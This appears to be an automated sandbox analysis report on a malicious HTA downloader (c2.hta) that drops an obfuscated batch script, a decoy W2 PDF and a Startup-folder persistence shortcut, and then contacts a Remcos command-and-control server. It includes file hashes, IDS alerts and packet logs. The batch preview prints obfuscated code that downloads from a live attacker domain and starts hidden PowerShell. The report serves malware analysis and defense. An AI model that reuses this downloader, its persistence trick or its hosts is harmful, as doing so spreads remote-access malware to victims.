SHA-512:	5DD3251B81D6C48B5071A9C11AF69345FA2DC9A55D9DBF516CCF25E616A8D4E93AC3E6F5A6BB9B5AA04D795AA5C200662C6B5A5645EC3CF6ADA9505003958B9C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n...j...B...8............@.......................................@.................................4........@..~...............X.......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...~....@......................@..@.reloc..2............N..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with very long lines (904), with CRLF line terminators
Category:	dropped
Size (bytes):	3634
Entropy (8bit):	5.236008723707643
Encrypted:	false
SSDEEP:	96:m+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:oCjaob3Z2SnE8tSqCB9Y
MD5:	87022BBA9DB0F800B26D9609ACBBCF49
SHA1:	D7BE8CC8D4CFFCCE0BD7D361037BBE575E49CC6A
SHA-256:	1F6CE0F5CD3793AAEA9B3F9DE99F04679B8DB2F1056532982D835E665006ECE7
SHA-512:	B7BE35A7A8EF40CF5326EFD77EB4A2EE05162B241267695C6927F12340BE3720AF299D37AFB5F02025EF8948E71C8A4F8CC21B5C805C9DD777797694C033D53F
Malicious:	true
Preview:	@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%..set url=https://myguyapp.com/msword.zip..s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%..set url2=https://myguyapp.com/W2.pdf..s%hwvwRF%e%QuDLrd%t%JICNv% %PxorhwP%u%aYH%r%hotHXeBZtg%l%oJKbuFDbgq%2%yHfekdVP%=%NdKRoGUgr%h%xKSx%t%rvRKBSleIX%t%SpSm%p%wbQdk%s%R%:%Dizx%/%HHLDZ%/%es%m%XjoF%y%J%g%olMBNbeo%u%DVZtkXm%y%MsH%a%LyuRF%p%Eryft%p%idiglSH%.%odKAWwiYof%c%CtLK%o%KjljBrysB%m%o%/%GQYaqs%W%LDmDZbmha%2%sFQKV%.%vIMk%p%VuXimjsr%d%acamBo%f%nrMe%..p%wsZX%o%zbulUZgp%w%inxp%e%aiWTgYV%r%KUWANAEWb%s%oDEk%h%gPNeE%e%ibNOiBI%l%LHUUm%l%ETUgg% %jDR%-%GUoW%W%j%i%OZUiVG%n%xC%d%EvHpV%o%BVeSOp%w%kLnyCABxV%S%Xb%t%IKytjHq%y%Pw%l%jYJgLlEn%e%cWXrPRDt% %xRzJFYoSU%H%BYa%i%aNxNnfpSO%d%mJLHttj%d%PEn

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	98682
Entropy (8bit):	6.445287254681573
Encrypted:	false
SSDEEP:	1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
MD5:	7113425405A05E110DC458BBF93F608A
SHA1:	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
SHA-256:	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
SHA-512:	6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
Malicious:	false
Preview:	0...u0...\...0....H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...\|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	737
Entropy (8bit):	7.501268097735403
Encrypted:	false
SSDEEP:	12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
MD5:	5274D23C3AB7C3D5A4F3F86D4249A545
SHA1:	8A3778F5083169B281B610F2036E79AEA3020192
SHA-256:	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
SHA-512:	FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
Malicious:	false
Preview:	0...0.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0....H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R.......~....)....i.n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.889436845812483
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
MD5:	A34A0DAF277C13FC5AFF64C0A7247999
SHA1:	FD9B47B23BD20B9903D8842AC8C17A9F96677E93
SHA-256:	1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
SHA-512:	7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..

C:\Users\user\Downloads\W2.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 2 pages
Category:	dropped
Size (bytes):	69437
Entropy (8bit):	7.717554924401452
Encrypted:	false
SSDEEP:	768:fGPGTXkz5QcYykzbvwj42yCuTP1mRPLHLxqf/f8LcivAM7jQlVdl8gbUvjODSrY5:o3z5jkzbvWg1qzndS1zSrpaaW
MD5:	296FBCEB79C89BCFFD636CB2D80C57F7
SHA1:	7AC0E8C3BBCA5B78289EC48D0785B03DE4E1F581
SHA-256:	568CB24BFE35FD292AA0923413E1707B057A281059759AF52FC4392F901A8383
SHA-512:	902BB7F56B5E5C49B8798154B5A79B0D820C41308A0BAA1346CBB2FE0C04BB2D6A756D27AF598E59EC0A688FBB19351F42338E58EE6DE2EC8A87566130EE7929
Malicious:	true
Preview:	%PDF-1.4.%.....1 0 obj.<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(......)]/DecodeParms<</BitsPerComponent 1/Predictor 15/Columns 2549/Colors 1>>/Intent/Perceptual/BitsPerComponent 1/Filter/FlateDecode>>stream.x...Mo...y.^..Q@.3.w..x9...z#...q. ...\|...U-...(5J%Re..^.f..F.m.".N..P/..7P(.J....Z....9...C.h....w.w......dO2}D..#A.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.~..'.

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.176025638229203
Encrypted:	false
SSDEEP:	3:hYFEHgAR+mQRKVxLZtFctFst3g4t32vov:hYFEmaNZM3MXt3X
MD5:	74D8C80188CB3C2AFD82E1821813B1CB
SHA1:	EEB1D7DC1821B7841EE50BC53AFF890544ECFBDA
SHA-256:	970057AABB3408E53F34A42FEF79D515688F7C1BBEA0567C1BF9B477B53F3AC2
SHA-512:	677341DE20037DD57D34587520DF436CFE3DFB09824AC4926F0BAC3B428B3FACB2007CADC74254879736195E4573D44AB88DE80E52D1A559C7096E7F9587A5BE
Malicious:	false
Preview:	..Waiting for 10 seconds, press a key to continue ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.5460239608919615
TrID:	HyperText Markup Language (12001/1) 40.67% HyperText Markup Language (11501/1) 38.98% HyperText Markup Language (6006/1) 20.35%
File name:	c2.hta
File size:	5'220 bytes
MD5:	cbcdda2a4fece3b9fe71dc53b039762d
SHA1:	61113f8d33d3331152a4e627b0720c0ab261fae8
SHA256:	30ce460b7556cd59def93926bcd3b3e3e2ff24a66f368c9deed7efe7117d0105
SHA512:	1a0ef1c47f793d2ec59601626cb6ea42b2b2a086b79df39facaf1c6d65fe24241be02c8c8c5582199dce965f17fbf81d3f6f11045e3f0a9207a6033f5d255a8c
SSDEEP:	96:uMk0YizhV1RgcQVx+P50wMmhtbSOyOsluH3:Ovs1EMx0wFHlYU
TLSH:	A5B1115FAF83DF725933C426496AAC4DDE98850B1024C045B58C888E7F3537DA8D62F7
File Content Preview:	<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKB

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T22:33:00.545381+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49734	193.26.115.39	443	TCP
2025-01-07T22:33:04.583951+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49736	193.26.115.39	443	TCP
2025-01-07T22:33:50.109027+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49753	193.26.115.39	7009	TCP
2025-01-07T22:33:51.238507+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49754	178.237.33.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 22:32:57.078214884 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.078253031 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.078491926 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.092557907 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.092575073 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.670762062 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.670852900 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.743911028 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.743928909 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.744210958 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.744260073 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.748213053 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.791327953 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.877561092 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.877599955 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.877649069 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:57.877671957 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.877701044 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.881392956 CET	49730	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:57.881407022 CET	443	49730	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:59.852762938 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:59.852832079 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:32:59.852901936 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:59.874593973 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:32:59.874617100 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.390088081 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.390156984 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.394109011 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.394121885 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.394330978 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.402483940 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.443340063 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.545398951 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.545420885 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.545815945 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.545842886 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.587454081 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.627516031 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.627523899 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.627567053 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.627609968 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.627619982 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.627651930 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.627710104 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.628992081 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.629009008 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.629091978 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.629098892 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.629170895 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.714257956 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.714273930 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.714674950 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.714687109 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.715044022 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.715955019 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.715996981 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.716015100 CET	443	49734	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:00.716028929 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.716068029 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.716068029 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:00.754982948 CET	49734	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:03.850564957 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:03.850610018 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:03.850683928 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:03.900727034 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:03.900746107 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.413218975 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.413325071 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.415061951 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.415071011 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.415304899 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.422533989 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.467329025 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.583976984 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.584002972 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.584086895 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.584106922 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.666089058 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.666107893 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.666160107 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.666173935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.666205883 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.668559074 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.668574095 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.668601036 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.668611050 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.668617964 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.668664932 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.753160000 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.753181934 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.753226995 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.753240108 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.753276110 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.753304005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.754684925 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.754699945 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.754827976 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.754836082 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.754942894 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.756342888 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.756371975 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.756416082 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.756426096 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.756452084 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.756464958 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.758105993 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.758120060 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.758183002 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.758189917 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.758405924 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.839821100 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.839839935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.839948893 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.839982033 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840389967 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840410948 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840467930 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.840476990 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840487957 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.840517998 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.840879917 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840893984 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.840971947 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.840977907 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841101885 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841121912 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841156006 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.841161966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841186047 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.841204882 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.841862917 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841876030 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.841931105 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.841936111 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.842128992 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.842145920 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.842181921 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.842186928 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.842211962 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.842231989 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.926496983 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.926512957 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.926590919 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.926600933 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927261114 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927278996 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927337885 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927344084 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927356958 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927413940 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927623987 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927637100 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927678108 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927683115 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927692890 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927783012 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927800894 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927831888 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927836895 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.927855968 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927882910 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.927993059 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928005934 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928051949 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928056955 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928268909 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928297043 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928332090 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928339005 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928363085 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928383112 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928648949 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928661108 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928713083 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928718090 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928725958 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928756952 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928884983 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928919077 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:04.928945065 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:04.928970098 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:05.139337063 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:05.314209938 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:05.543338060 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 22:33:05.543390989 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 22:33:06.019324064 CET	443	49736	193.26.115.39	192.168.2.4
